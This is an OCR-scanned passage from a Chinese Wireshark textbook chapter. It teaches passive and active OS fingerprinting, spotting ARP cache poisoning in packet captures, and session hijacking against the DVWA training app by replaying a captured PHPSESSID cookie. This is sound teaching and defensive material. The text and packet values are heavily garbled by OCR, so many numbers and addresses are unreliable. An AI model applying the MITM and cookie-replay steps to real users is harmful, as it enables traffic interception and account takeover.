捕获 文件 passiveosfingerprinting.pcap 中 的 数据 包 是 这 项 扩 术 的 绝 佳 
例子 。 该 文件 含有 两 个 数据 包 。 它 们 都 是 目标 端口 为 80 的 TCP SYN 数 据 
包 ， 但 来 自 不 同 的 主机 。 仅 仅 使 用 这 些 数据 包 中 的 值 ， 并 参考 表 12-1， 
人 定 每 台 主 机 使 用 的 操作 系统 染 构 。 每 一 个 数据 包 的 细 忆 如 图 
12-7 有 不 。 


是 Wireshark . Packet 1 ， passiveosfingerprinting 


> Frame 1: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) on interface 9 
> Ethernet II, Src: Vmware f9:74:d8 (00:0c:29:19:74:d8), Dst: D-Link 21:99:4c (680:05:5d:21:99:4c) 
Vv Internet Protocol Version 4, Src; 172,16.16,134, Dst; 168.143,162,100 

8189 ,... = Version: 4 

---- 181 = Header Length: 28 bytes 

Differentiated Services Field: 9x00 (DSCP: C5S8, ECN: Not-ECT) 

Total Length: 48 

Identification: 9Bx4d86 (198406) 

Flags: 9x92 (Don't Fragment) 

Fragment offset: © 

Time to live: 128 

Protocol: TCP (6) 

Header checksum: @xaSbd [validation disabled] 

Source: 172.16.16.134 

Destination: 168.143.162.100 

[Source GeoIP:; Unknown] 

[Destination GeoIP: Unknown ] 


Source Port: 1176 
Destination Port: 86 
[Stream index; 8] 

[TCP Segment Len: 8] 
sequence number: 2123482838 
Acknowledgment number: 8 
Header Length: 28 bytes 


Nindow size value: 64246 
[Calculated window size: 64248] 
Checksum: 9x3676 [validation disabled] 
Urgent pointer: 日 
Y Options: (8 bytes), Maximum segment size, No-Qperation (NOP), No-Qperation (NOP), SACK permitted 
> Maximum segment size: 1449 bytes 
> No-Operation (NOP) 
> No-Qperation (NOP) 
> TCP SACK Permitted Option; True 


No.: 1 ' Time: 0.000000 * Sowurre: 172.16.16.134 " Desvnatvon: 168,143,.162,100°. hh: 82 " Info: 1178 ~ S80 ISYN) Seq=2123492830 Win=64240 Len=0 MSS=1440 SACK PER, 


古 Wireshark . Packet 2 . passiveosfingerprinting 


> Frame 2: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) on interface 8 
> Ethernet II, Src: Vmware f9:74:d8 (88:8c:29:f9:74:d8), Dst: D-Link 21:99:4c (88:85:5d:21:99:4c) 
Y Internet Protocol Version 4, Src: 172.16.16.134, Dst: 168.143-162.100 

9106 .... = Version: 4 

.vv， 0191 = Header Length; 28 bytes 

Differentiated Services Field: 8x88 (DSCP: CS8, ECN: Not-ECT) 

Total Length: 48 

Identification: @x4d80 (19846) 

Flags: 8x82 (Don't Fragment) 

Fragment offset: 9 

Time to live: 64 

Protocol: TCP (6) 

Header checksum: 9xe5bd [validation disabled] 

Source; 172.16.16.134 

Destination: 168.143.162.188 

[Source GeoIP: Unknown] 

[Destination GeoIP: Unknown] 
Y Transmission Control Protocol, Src Port: 1176 (1176), Dst Port: 89 (80), Seq: 2123482830, Len: 0 

Source Port: 1176 

Destination Port: 80 

[Stream index: 8] 

[TCP Segment Len: 8] 

sequence number: 21234828308 

Acknowledgment number: 9 

Header Length: 28 bytes 


Window size value: 29298 
[Calculated window size: 2928] 
Checksum: @x25e5 [validation disabled] 
Urgent pointer: 9 
Options: (8 bytes), Maximum seegment size, No-Operation (NOP), No-Operation (NOP), SACK permitted 
>》 Maximum segment size: 1468 bytes 
> No-Operation (NOP) 
> No-Operation (NOP) 
> TCP SACK Permitted Option: True 
> [SEQ/ACK analysis] 


No.: 2 * Time: D.DO0108 * Source’ 172.16.16.134 " Destination: 168,143.162,100 *. Out-OF Order) 1176 — 80 [SYN) Seq=2123482830 Win=2920 Len=0 MSS=1460 SACK PE 





图 12-7 这些 数 据 包 可 以 告诉 我 们 它们 来 自 哪 种 操作 系统 


Wireshark . Packet 1 , passiveosfin rintin 
p 9erp 9 


> Frame 1: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) on interface 9 
> Ethernet II, Src: Vmware f9:74:d8 (00:0c:29;f9:74:d8), Dst:; D-Link 21:99;4¢ (80:05:;5d:21:99;4c) 
v Internet Protocol Version 4, Src: 172.16.16.134, Dst: 168.143.162.106 

gl100 .... = Version: 4 

“a. G181 = Header Length: 28 bytes 

Differentiated Services Field: 9x99 (DSCP: CS8, ECN: Not-ECT) 

Total Length: 48 

Identification: 9x4d86 (19840) 

Flags: Ox802 (Don't Fragment) 

Fragment offset: 9 

Time to live: 128 

Protocol: TCP (6) 

Header checksum: 9xa5bd [validation disabled] 

Source: 172.16.16.134 

Destination: 168.143.162.100 

[Source GeoIP: Unknown] 

[Destination GecoIP: Unknown] 


Source Port: 1176 
Destination Port; 580 
[Stream index: 8] 

[TCP Segment Len: 0] 
Sequence number: 2123482830 
Acknowledement number: 9 
Header Length: 28 bytes 


Window size value: 64249 
[Calculated window size: 64249] 
Checksum: 9x3676 [validation disabled] 
Urgent pointer: 日 
Y Options: (8 bytes), Maximum segment size, No-Qperation (NOP), No-Qperation (NOP), SACK permitted 
> Maximum segment size: 1448 bytes 
> No-OQperation (NOP) 
> No-OQperation (NOP) 
>》 TCP SACK Permitted Option: True 


No,r 1 “ Time; 0.000000 * Sourve; 172,16,16,134 " Desvinanon: 168,143,162,100 "fh; 62 * Infos 1176 — 0 1SYN) Seq=2123492030 Win=64240 ten=0 MSS=1440 SACK PER, 


人 Wireshark .Packet 2 . passiveosfingerprinting 


> Frame 2: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) on interface 0 
> Ethernet II, Src: Vmare 19:74:d8 (880:8c:29:f9:74:d8), Dst: D-Link 21:99:4c (980:85:5d:21:;99:4c) 
v Internet Protocol Version 4, Src: 172.16.16.134, Dst: 168.143.162.188 

8160 .... = Version: 4 

.... 0101 = Header Length: 28 bytes 

Differentiated Services Field: 8x88 (DSCP: CS8, ECN: Not-ECT) 

Total Length: 48 

Identification: 6x4d86 (19846) 

Flags: 8x82 (Don't Fragment) 

Fragment offset: 9 

Time to live: 64 

Protocol: TCP (6) 

Header checksum: 9xe5bd [validation disabled] 

Source: 172.16.16.134 

Destination: 168-143.162.1096 

[Source GeoIP: Unknown] 

[Destination GeoIP: Unknown] 
Y Transmission Control] Protocol, Src Port: 1176 (1176), Dst Port: 89 (80), Seq: 2123482838, Len: 9 

Source Port: 1176 

Destination Port: 8 

[Stream index: 8] 

[TCP Segment Len: 8] 

sequence number: 21234828390 

Acknowledgment number: 9 

Header Length: 28 bytes 


Window size value: 2929 
[Calculated window size: 2926] 
Checksum: 8@x25e5 [validation disabled] 
Urgent pointer: 9 
Options: (8 bytes), Maximum segment size, No-Operation (NOP), No-Operation (NOP), SACK permitted 
> Maximum segment size: 1468 bytes 
> No-Operation (NOP) 
> No-Operation (NOP) 
> TCP SACK Permitted Option: True 
> [SEQ/ACK analysis] 


No,: 2 * Time: 0.000108 * Sowrce; 172,16.16,134 " Destination: 168,143,162,100 .Out-OF Order] 1178 — 80 [SYN] Seq=2123482830 Win=2920 Len=0 M55=14650 SACK PE 


Close | Help 








图 12-7 ”这 些 数据 包 可 以 告诉 我 们 它们 来 自 哪 种 操作 系统 续 ) 
参考 表 12-1， 我 们 将 这 些 数据 包 的 相关 字段 分 类 ， 创 建 了 表 12-2。 


表 12-2 操作 系统 指纹 术 的 数据 包 分 类 


Hite 下 所 包 1 的 人 
» 


基于 这 些 值 ， 我 们 可 以 得 出 结论 : 发 送 数据 包 1 的 设备 运行 
Windows 的 可 能 性 最 大 ， 而 发 送 数据 包 2 的 设备 运行 Linux 的 可 能 性 了 最 
大 。 


要 记 住 ， 表 12-2 列 出 的 被 动 陈 操作 系统 指纹 拉 术 的 利 见 识别 字段 并 
不 完整 。 很 多 实现 上 的 “ 怪 辛 * 可 能 会 村 臻 真实 值 与 期 户 值 的 偏 焉 。 所 
以 ， 你 不 能 完全 依赖 被 动 式 操作 系统 指纹 技术 得 到 的 结 来 。 











有 一 个 Mp0f 的 工具 使 用 了 操作 系统 指纹 识别 拉 术 。 该 工具 分 析 捕 获 数 据 包 的 相关 字段 ， 
然后 输出 可 能 的 操作 系统 。 使 用 像 p0f 这 样 的 工具 ， 你 不 仅 能 了 解 到 操作 系统 染 构 ， 有 时 甚至 
能 了 解 适 当 的 版 本 写 或 者 补丁 级 列 。 





2. 主动 式 指纹 技术 


当 锌 动 监听 流量 不 能 得 出 想 要 的 结果 时 ， 可 能 需要 一 个 更 直接 的 方 
法 。 这 种 方法 叫做 “主动 式 指纹 技术 ”。 它 是 指 攻 击 者 主动 回 受 害 者 友信 
特意 构造 的 数据 包 以 引起 啊 应 ， 然 后 从 啊 应 数据 包 中 获知 党 害 者 机 融 操 


作 系 统 的 拉 术 。 当 然 ， 由 于 这 种 方法 要 与 受害 者 直接 退 信 ， 因 此 它 并 不 
是 最 隐 釉 的 ， 但 它 可 以 做 到 非 第 高效 。 


捕获 文件 activeosfingerprinting.pcap 包 含 了 使 用 Nmap 扫 摘 工 具有 起 
主动 式 指 纹 扫描 的 例 于 。 文 件 中 有 一 些 是 Nmap 及 送 的 探 训 数 据 包 ， 这 
些 探 测 数据 包 引 起 的 啊 应 可 用 于 识别 操作 系统 。Nmap 记 录 下 对 这 些 探 
训 数 据 包 的 啊 应 并 创建 一 个 指纹 ， 与 指纹 数据 库 对 比 后 得 出 结论 。 


BE 








Nmap 使 用 的 主动 式 操作 系统 指纹 技术 十 分 复 林 。 想 了 解 Nmap 如 何 执行 主动 式 操 作 系 统 
Nmap Network Scanning。 这 是 Nmap 扫 摘 才 作 者 





指纹 技术 ， 请 阅读 Nmap 的 权威 指南 
Gordon “Fyodor”Lyon 的 著作 。 








12.2 ”流量 操纵 


12.2.1 ARP 绥 存 污 染 攻击 


在 第 7 草 中 ， 我 们 讨论 了 ARP 协 议 是 如 何 将 网 络 中 的 卫 地 址 映射 成 
MAC 地 址 的 ， 在 第 2 童 中， 我们 讨论 了 将 ARP 绥 存 污染 攻击 作为 监听 主 
机 流量 的 方法 。ARP 绥 存 污染 攻击 是 网 络 工程 师 高 效 实 用 的 工具 。 然 
而 ， 备 有 恶意 企 网 ， 它 也 是 一 个 非常 致命 的 中 间 人 攻击 Cman-in-the- 
middle，MITM) 方法 。 


在 MITM 攻 击 中 ， 攻 击 者 香 定 同 两 台 主 机 间 的 流量 ， 试 图 在 传输 过 
程 中 拦截 或 修改 。MITM 攻 击 有 多 种 形式 ， 包 括 会 话 劫持、DNS 其 骗 ， 
以 及 SSL 动 持 。 


ARP 绥 存 污染 攻击 之 所 以 有 效 ， 是 因为 特意 构造 的 ARP 数 据 包 使 两 
台 主 机 相信 它们 在 互相 通信 ， 而 实际 上 它们 却 是 与 一 个 在 中 间 转 发 数据 
包 的 第 三 方 通 信 。 


文件 arppoison.pcap 包 含 了 了 ARP 缓存 污染 攻击 的 一 个 例子 。 当 打开 筷 
上 时， 第 一 眼 你 会 及 现 这 坚 流 量 看 起 来 很 正常 。 然 而， 如 本 你 跟 进 这 些 数 
据 包 ， 就 会 发 现 我 们 的 受害 者 172.16.0.107 在 浏览 Google 并 执行 搜索 。 搜 


索 的 结果 导致 了 一 些 HITP 流 量 ， 并 夹杂 一 些 DNS 碍 询 。 

我 们 知道 ARP 组 存 污染 攻击 是 发 生 在 第 二 层 的 技术 ， 所 以 如 果 只 是 
在 Packet List 面 板 里 随意 浏览 ， 娩 怕 很 难 发 现任 何 异 第 。 因 此 ， 我 们 在 
Packet List 面 板 里 增加 几 列 ， 过 程 如 下 。 

(1) 选择 Edit->Preferences 。 

(2) 单 击 Preferences 窗 口 左 边 的 Columns。 

(3) 半 击 Add. 

(4) 输入 Source MAC 并 按 回 车 键 。 

(5) 在 Field type 下 拉 列 表 里 ， 选 择 Hw src addr (resolved)。 

(6) 单 击 新 增加 的 项 ， 拖 动 它 到 Source 列 后 面 。 

(7) 单 击 Add。 

(8) 输入 Dest MAC 并 按 回 车 键 。 

(9) 在 Field type 下 拉 列 表 里 ， 选 择 Hw dest addr (resolved)。 

(10) 单 击 新 增加 的 项 ， 拖 动 它 到 Destination 列 后 面 。 

(11) 单 击 OK 使 改动 生效 。 


当 完 成 这 些 步骤 时 ， 你 的 屏幕 应 该 跟 图 12-8 一 样 。 你 现在 应 该 有 额 
外 的 两 列 ， 分 别 显示 了 数据 包 的 来 源 MAC 地 址 和 目标 MAC 地 址 。 


如 果 你 还 打开 了 了 MAC 地 址 解析 ， 应 该 会 看 到 通信 设备 的 MAC 地 址 
表明 它 是 Dell 或 Cisco 人 硬件 。 这 是 很 重要 的 ， 因 为 当 我 们 深 动 整个 捕获 记 
录 时 ， 这 些 信息 在 数据 包 54 束 开始 改变 了 了 。 我 们 看 到 了 一 些 奇怪 的 ARP 
流量 ， 在 Dell 主 机 (受害 者 ) 和 新 出 现 的 HP 主机 (攻击 者 ) 之 间 交 互 ， 
如 图 12-9 所 示 。 





帮 Wireshark . Preferences ? XxX 








Y Appearance 











Layout Displayed Title Type Field Name Field Occurrence 

Columns No. Number 

Font and Colors Time Time (format as specified) 
Capture Source Source address 
Filter Expressions Source MAC Hw src addr (resolved) 
Name Resolution Destination Destination address 
Protocols Dest MAC Hw dest addr (resolved) 
Statistics protocol protocol 
Advanced Info Information 

| | 一 
< > 








Cancel Help 








图 12-8 ”Column 配 置 屏 秦 ， 包 含 了 新 增 的 来 源 和 目标 刹 件 地 址 列 


No， Time Source Source MAC Destination Dest MAC Protocol Info 
54 4.171569 HewlettP bf:91:e HewlettP bf:91:ee Dell c@:56:f8 0 Dell ce9:56:f9 ARP Who has 172.16.0.107? Tell 172.16.0.1 
@55 0.686053 De 1] c9:56:f9 Dell c8:56:f@ HewlettP bf:91:ee HewlettP bf:91:ee ARP 172.-16.9.107 is at 096:21:79:c9:56:f9 
56 8.608813 Hewlettp bf:91: HewJettP bf:91:ee Dell c98:56:f9 Dell c9:56:f9 ARP @ 172.16.0.1 is at 99:25:b3:bf:91:ee 





图 12-9 _ Del 设备 和 HP 设备 间 奇 怪 的 ARP 流 量 


在 进一步 深入 之 前 ， 注 意 一 通信 中 涉及 的 痛 点 ， 由 表 12-3 列 
出 。 


表 12-3 监视 的 端点 


受害 者 172.16.0.107 00:21:70:c0:56:f0 





路 由 需 Cisco 172.16.0.1 00:26:0b:21:07:33 
攻击 者 HP 未 知 00:25:b3:bf:91:ee 


是 什么 使 流量 变 得 奇怪 呢 ? 回忆 一 下 我 们 在 第 6 章 对 ARP 的 讨论 ， 
ARP 数 据 包 有 两 种 类 型 :请求 和 啊 应 。 请 求 数 据 包 在 网 络 上 广播 给 所 有 
主机 ， 用 以 及 现 包 合 特 定 耳 地址 的 机 大 的 MAC 地 址 。 接 着 ， 啊 应 信息 作 
为 单 播 数据 包 发 给 请 求 的 设备 。 在 这 个 育 景 下 ， 我 们 从 通信 序列 中 发 现 


了 一 坚 奇 怪 的 事情 ， 参 见 图 12-16。 


首先 ， 数 据 包 54 是 MAC 地 址 为 00:25:b3:bf:91:ee 的 攻击 者 发 送 的 
ARP 请 求 ， 它 作为 里 播 数 据 包 直接 发 送 给 MAC 地 址 为 00:21:70:c0:56:f0 
的 受害 者 @。 这 种 类 型 的 请 求 本 应 该 广播 给 网 络 上 所 有 主机 ， 但 它 却 只 
是 直接 发 给 了 受害 者 。 我 们 又 注意 到 虽然 这 个 数据 包 是 攻击 者 发 送 的 ， 
并 且 在 ARP 头 部 包含 了 攻击 者 的 MAC 地 址 ， 但 它 却 列 出 了 路 由 器 的 IP 
地 址 ， 而 不 是 它 目 己 的 。 


紧 随 这 个 数据 包 的 是 受害 者 发 给 攻击 者 的 啊 应 ， 包 含 它 的 MAC 地 
址 信息 信 。 最 诡异 的 事情 出 现在 数据 包 56 里 : 攻击 者 给 受害 者 发 送 了 一 
个 包含 未 请 求 ARP 啊 应 的 数据 包 ， 告 诉 它 172.16.0.1 对 应 的 MAC 地 址 是 
00:25:b3:bf:91:ee@。 问 题 是 172.16.0.1 对 应 的 MAC 地 址 不 是 
00:25:b3:bf:91:ee 而 应 该 是 00:26:0b:31:07:33。 因 为 在 之 前 的 数据 包 捕 获 
中 我 们 看 到 过 路 由 上 如 172.16.0.1 与 受害 者 的 通信 ， 所 以 我 们 知道 事实 本 
应 如 此 。 由 于 ARP 协 议 内 在 的 不 安全 性 〈 它 的 ARP 表 接收 未 请 求 的 更 
新 ) ， 因 此 现在 受害 者 会 将 本 应 发 送 到 路 由 需 的 流量 发 送 给 攻击 者 。 


BB 





因为 这 些 数据 包 是 从 受害 者 机 桌 上 捕获 的 ， 所 以 你 实际 上 没有 看 到 事情 的 全 貌 。 要 使 攻 














击 生效 ， 攻 击 者 必须 给 路 由 占 友 送 同 样 序 列 的 数据 包 ， 骗 它 认 为 攻击 者 束 是 受害 者 。 但 我 们 
需要 在 路 由 占 〈( 或 攻击 者 ) 捕获 才能 看 到 这 些 数据 包 。 





一 旦 两 涉 都 上 当 ， 受 害 者 和 路 由 上 莫 间 的 通信 就 会 流 经 攻击 者 ， 如 图 
12-10 所 示 。 


数据 包 57 可 以 确认 攻击 取得 成 功 。 当 你 用 神秘 的 ARP 通 信之 前 发 送 
的 数据 包 《〈 比 如 数据 包 40， 参 见 图 12-11) 与 它 比 较 时 ， 就 会 发 现 远程 
服务 器 〈Google) 的 IP 地 址 是 一 样 的 @， 但 目标 MAC 地 址 却 变 化 了 人 @。 
OE ， 现 在 的 流量 抵达 路 由 器 之 前 将 被 路 由 到 攻 


这 个 攻击 如 此 狐 独 ， 以 至 它 很 难 被 检 柚 。 要 想 友 现 它 ， 你 通常 需要 
专门 配置 IDS 的 帮助 ， 或 者 在 设备 上 运行 能 检测 ARP 表 项 突然 变化 的 软 
件 。 因 为 你 很 可 能 会 想 利 用 ARP 绥 生 污 染 攻 击 来 捕获 网 络 上 的 数据 包 以 
便 分 机 ， 所 以 了 解 如 何 使 用 这 种 扩 术 也 征 很 重要 的 。 


ARP 欺 骗 过 程 〈《 受 害 者 角度 ) 


一 -一 一 和 
Who has 172.16.0.1078 Tell 172.16.0.1 
源 MAC 地 址 : 
00:25:b3:bf:21:ee 
目的 MAC 地 址 : 
00:21708W056:0 
一 
路 由 器 172. T60107 is .ot O00:21:70:60D:50:10 
(Cisco) 攻击 者 源 MAC 地 址 : Target 
172.16.0.1 {HP) 00:21:70:c0:56:f0 {Dell) 


00:26:0b:21:07:33 00:25:b3:bf:91:ee es a 172.16.0.107 
ee 00:21:70:c0:56:f0 





172.16.0.1 is at 00:25:b3:bf:21:ee 
源 MAC 地 址 : 
00:25:b3:bf:91:ee 
目的 MAC 地 址 : 
00:21:70:c0:56:f0 


ARP 欺 骗 结果 〔 攻 击 者 窃听 流量 ) 








/ 
路 由 器 攻击 者 Target 


图 12-10 ARP 缓存 污 染 导 致 MITM 攻 击 


磊 Wireshark , Packet 40 ,arppoison 


> Frame 49: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface 8 
v Ethernet II, Src: Del]l c@:56:f0 (8680:21:760:c0:56:10), Dst: CiscoInc 31:87:33 (60:26:6b:31:87:33) 
> Destination: CiscoInc 31:87:;33 (898:26:8b:31;87:33) 和 
> Source: Dell c9:56:f9 (88:21:70:c0:56:f8) 

Type: IPv4 (9x9869) 
Y Internet Protocol Version 4, Src: 172.16.9.197，Dst: 74.125.95.147 

el106 .... = Version: 4 

.... 808161 = Header Length; 26 bytes 

Differentiated Services Field: 8x8@ (DSCP: CS8@, ECN: Not-ECT) 

Total Length: 52 

Identification: 9x37bf (38847) 

Flags: 9x92 (Don't Fragment) 

Fragment offset: 8 

Time to live: 64 

Protocol: TCP (6) 

Header checksum: @x4c79 [validation disabled] 

Source: 172.16.8.187 

Destination: 74.125.95.147 和 

[Source GeoIP: Unknown] 

[Destination GeoIP: Unknown] 
> Transmission Control Protocol, Src Port: 45692 (45692), Dst Port: 808 (88), Seq: 619879587, Ack: 2814369513，Len: 9 





Fi Wireshark . Packet 57 . arppoison 





> Frame 57: 968 bytes on wire 【7686 bits), 968 bytes captured (7688 bits) on interface 9 
v Ethernet II, Src: Dell_c9:56:f9 (09121:761c9:56:f6)，Dst: HewlettP bf:91:ee (80:25:b3:bf:91:ee) 
> Destination: HewlettP bf:91:ee (88:25:b3:bf:91:ee) ©O 
> Source: Dell c8:56:18 (868:21:780:c8:56:16) 

Type: IPv4 (0x8888) 
Y Internet Protocol Version 4, Src: 172.16.0.187, Dst: 74.125.95.147 

8100 .... = Version; 4 

.gl191 = Header Length: 28 bytes 

Differentiated Services Field: 9x69 (DSCP: CS@, ECN: Not-ECT) 

Total Length: 946 

Identification; @x3afl (15889) 

Flags: 0x92 (Don't Fragment) 

Fragment offset: 9 

Time to live: 64 

Protocol: TCP (6) 

Header checksum: 9xa5c9 [validation disabled] 

Sourcel 172.16.9.197 

Destination: 74.125.95.147 全 

[Source GeoIP: Unknown] 

[Destination GeoIP: Unknown] 


> Transmission Control Protocol, Src Port: 45691 (45691), Dst Port: 89 (88), Seq: 689865591, Ack: 1647628296, Len: 894 
> 


No.: 537 * Time: 1.906795 - Sourre: 172,16.0.107 - Source MAC: Dell cS5:10 - Destination: 74.125.95,14 qi=6aqgl=809= Logs rai=B/p=S70AO6r 6 1 bh = Tech=18ps=dNO TOeRY OM SwHI2792515729190 HTT 


La [ti | 





图 12-11 目标 MAC 地 址 的 变化 说 明 这 次 攻击 是 成 功 的 


帮 Wireshark , Packet 40 ,arppoison 





”Frame 49: 66 bytes on wire (528 bits)，66 bytes captured (528 bits) on interface 8 
Y Ethernet II, Src: Dell c@:56:f@ (99:21:79:cB:56:fB)，Dst: CiscoInc 31:87:33 (60:26:6b:31:87:33) 
» Destination:; CiscoInc 31:;87:33 (98:26:9b:31;:07:33) OO 
” Source: Dell c9:56:f9 (96121:79:c9:56:f9) 
Type: IPv4 (9x8869) 
v Internet Protocol Version 4, Src: 172.16.0.187, Dst: 74.125.95.147 
8108 .... = Version: 4 
. 8181 = Header Length: 28 bytes 
”Differentiated Services Field: 9x69 (DSCP: CS8, ECN: Not-ECT) 
Total Length; 52 
Identification: @x97bf (38847) 
> Flags: @x82 (Don't Fragment) 
Fragment offset: 8 
Time to live: 64 
Protocol: TCP (6) 
» Header checksum: @x4c79 [validation disabled] 
Sourcel 172.16.9.197 
Destination: 74.125.95 .147 © 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
”Transmission Control Protocol, Src Port: 45692 (45692), Dst Port: 80 (80), Seq: 619879587, Ack: 28143686513, Len: 8 











No.: $0 * Timer: 0.000013 " Sourre: 172.15.0.107 " Sourre MAC: Dell cDS5r/D " Destimation: 7 125.95.147 " col TCP ' Info: 45692 一 BO [ACK) Seq=519079507 Ack=2814360513 Win=6912 Len=0 TSval= S888561 TSecr=321. 


Ce Cm 


rk . Packet $7 ,ar ISOn | 


> Frame 57: 968 bytes on wire 【7686 bits), 968 bytes captured (7688 bits) on interface 9 
Y _ Ethernet II, Src: Dell_c9:;56:f9 (80:21:70:c0:56:f0), Dst: HewlettP_bf:91:ee (680:25:b3:bf:91:;ee) 
» Destination: HewlettP bf:91:ee (99:25:b3:bf:91:ee) 各 
” Source: Dell c9:56:f9 (696:21:79:c6:56:f9) 
Type: IPv4 (Ox0800) 
v Internet Protocol Version #, Src: 172.16.0.107, Dst: 74.125.95.147 
9106 .... = Version: 4 
. 8101 = Header Length: 26 bytes 
» Differentiated Services Field: 9x69 (DSCP; C58, ECN: Not-ECT) 
Total Length: 346 
Identification: 9x3af1 (15889) 
> Flags: Ox82 (Don't Fragement) 
Fragment offset: 8 
Time to live: 64 
Protocol: TCP (6) 
> Header checksum: Bxa5c93 [validation disabled]| 
Source: 172.16.9.197 
Destination: 74.125.95.147 他 
[Source GeoIP: Unknown ] 
[Destination GeoIP: Unknown] 
Transmission Control Protocol, Src Port: 45691 (45691), Dst Port: 89 (88), Seq: 689865591, Ack: 1647628296, Len: 894 
We 








No.: 57 ~- Time: 1,906795 - Sourre;: 172,16.0.107 - Source MAC: Dell O55 - Destnation: 74,125.95,14_Tq=6aq=609= Ldos ra=8p=S7 oAO6 6 oA = 18ech=18n5s=0NO TOeRY EM S60WwHI27 9251S7291W0 HTT 
Close Help 





图 12-11 目标 MAC 地 址 的 变化 说 明 这 次 攻击 是 成 功 的 ( 续 ) 


12.2.2 ”会话 动 持 


现在 你 了 解 了 如 何 亚 意 使 用 ARP 组 人 存 投 毒 。 我 现在 将 诗 示 一 种 利用 
ARP 绥 存 投 毒 的 技术 : 会 话 劫持。 在 会 话 劫持 中 ， 攻 击 者 贸 取 一 个 
HTTP 会 话 cookie， 然 后 伪 冯 为 另 一 个 用 户 ; 我 们 将 很 快 对 HTTP cookie 
进行 学 习 。 为 了 达到 这 个 目的 ， 攻 击 者 使 用 ARP 绥 和 存 投 毒 截获 一 次 目标 
通信 ， 并 找到 相关 的 会 话 cookie 信 息 。 随 后， 攻击 者 能 够 使 用 急 取 的 
cookie， 以 对 应 用 户 的 里 份 访 问 目 标 Web 应 用 。 


这 个 场景 的 通信 数据 在 sessionhijacking.pcapng 中 。 抓 包 文 件 包含 目 
标 〈172.16.16.164) 与 Web 应 用 (172.16.16.181) 之 间 的 传输 数据 包 。 
用 户 在 不 知情 的 情况 下 成 为 攻击 受害 者 ， 他 们 的 通信 过 程 被 攻击 者 


(172.16.16.154) 主动 监听 。 这 些 数 据 包 在 Web 服 务 如 上 被 抓 取 ， 这 与 
会 话 劫持 发 生 时 ， 防 御 者 的 角度 一 致 。 


[注意 有 





本 例 中 访问 的 Web 应 用 是 Damn Vulnerable Web Application (DVWA) 。 此 应 用 预 留 了 很 


多 可 被 多 种 攻击 方式 利用 的 漏洞 ， 经 常 被 作为 教学 工具 使 用 。 





抓 取 的 通信 过 程 基本 由 两 个 会 话 组 成 。 第 一 个 会 话 在 目标 用 户 和 
Web 服 务 器 之 间 进 行 ， 使 用 过 滤器 ip.addr == 172.16.16.164 && 
ip.addr == 172.16.16.181 分 离 此 会 话 。 这 是 一 次 正常 的 网 页 浏览 通 
信 ， 并 没有 特别 之 处 。 出 于 特殊 的 目的 ， 我 们 主要 关注 请 求 中 的 cookie 
值 。 例 如 ， 在 数据 包 14 的 GET 请 求 中 ， 你 会 在 数据 包 详 情 窗口 中 友 现 
cookie， 如 图 12-12 所 示 。 此 处，cookie 使 用 PHPSESSID 
值 ncobrqrb7fj2a2sinddtk567q4 人 @@ 标 识 会 话 ID。 


帮 Wireshark . Packet 14 .sessionhijacking 





rame 14: 662 bytes on wire (4816 bits), 682 bytes captured (4816 bits) on interface 9 
Ethernet II, Src: IntelCor f8:91:ac (f8:16:54:f8:91:ac)，Dst: Vmware d8:dd:2b (899:6c:29:d8:dd:2b) 
Internet Protocol Version 4, Src: 172.16.16.164, Dst: 172.16.16.181 
Transmission Control Protocol, Src Port: 68432 (68432), Dst Port: 80 (86), Seq: 1685846135, Ack: 1765521347, Len: 536 
Y Hypertext Transfer Protocol 
GET /dvwa/index.php HTTP/1.1\r\n 
Host: 172.16.16.181\r\n 





ion: keep-alive\r\n 
Cache-Control:; max-age=8\r\n 
Accept: text/html,application/xhtml+xm]l ,application/xml;q=0.9,image/webp,*/*;q=8.8\r\n 
Uperade-Insecure-Requests: 1\r\n | 
User-Agent: Mozilla/5.8 (Macintosh; Intel Mac 05 X 19 19 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.186 Safari/537.36\r\n 
erer: http://172.16.16.181/dvwa/login.php\r\n | 
dch\r\n 


: security=impossible; PHPSESSID=ncobrqrb7fj2a2sinddtk567q4\r\n 
村 i ibl 


air: security=impossi 
i air: PHPSESSID=ncobrqrb7fj2a2sinddtk567q4 人 0 


wna/ index. ph 











SI 172.16. 16.181 " Request Method GET ' Request URI /dvw.. ty/=impossible, PHPSESSID= ncobr grb /232sindok S794 * Protoeol: HTTP " Length: S02 :JP GET /dywa/indexr. pip 1} 





图 12-12 ”查看 目标 用 户 的 会 话 cookie 


网 站 使 用 cookie 维 护 每 个 用 户 的 会 话 信 息 。 当 一 个 新 用 户 访 问 网 站 
时 ， 用 户 将 使 用 一 个 会 话 ID 用 于 喘 份 识别 〈 本 例 中 为 PHPSESSID ) 。 
在 用 户 验 证 过 程 中 ， 很 多 应 用 在 用 户 使 用 会 话 卫 完成 验证 后 ， 在 数据 库 
中 创建 相应 的 记录 ， 将 会 话 ID 作为 已 验证 的 会 话 任 证。 任何 使 用 这 一 ID 
的 用 户 都 能 够 使 用 此 次 验证 记录 接 入 应 用 。 当 然 ， 开 发 者 愿意 相信 ， 只 
有 一 个 用 户 能 够 使 用 某 一 个 特定 的 ID， 因 为 生成 方式 保证 ID 是 独一无二 
的 。 然 而 ， 这 种 处 理会 话 ID 的 方式 是 不 安全 的 ， 因 为 恶意 用 户 能 够 神 取 
其 他 用 户 的 ID， 然 后 伪造 身份 。 目 前 有 一 些 方法 可 以 用 于 防止 会 话 动 持 


的 发 生 ， 但 是 很 多 网 站 ， 包 括 DVWA， 仍 然 能 够 被 会 话 动 持 。 


受害 者 没有 意识 到 他 们 的 通信 正在 被 监听 ， 或 是 发 现 他 们 的 会 话 
cookie 被 攻击 者 截取 ， 如 图 12-12 所 示 。 现 在 ， 攻 击 者 只 需要 使 用 禄 取 的 
cookie 值 即 可 与 Web 服 务 喜 通信 。 可 以 通过 茶 些 代理 服务 喜 完 成 这 项 工 
作 ， 不 过 ， 使 用 浏览 占 插 件 会 更 简单， 如 Chrome 的 Cookie 管 理 硕 。 利 用 
eh 攻击 者 可 以 将 PHPSESSID 设 置 为 从 以 上 通信 获取 的 值 ， 如 图 
12-13 有 所 不 。 


how : All 





All ub Dor 
d New Cookie 


DVWA， 








图 12-13 ”使 用 Cookie 管 理 器 插件 盗用 受害 者 身份 


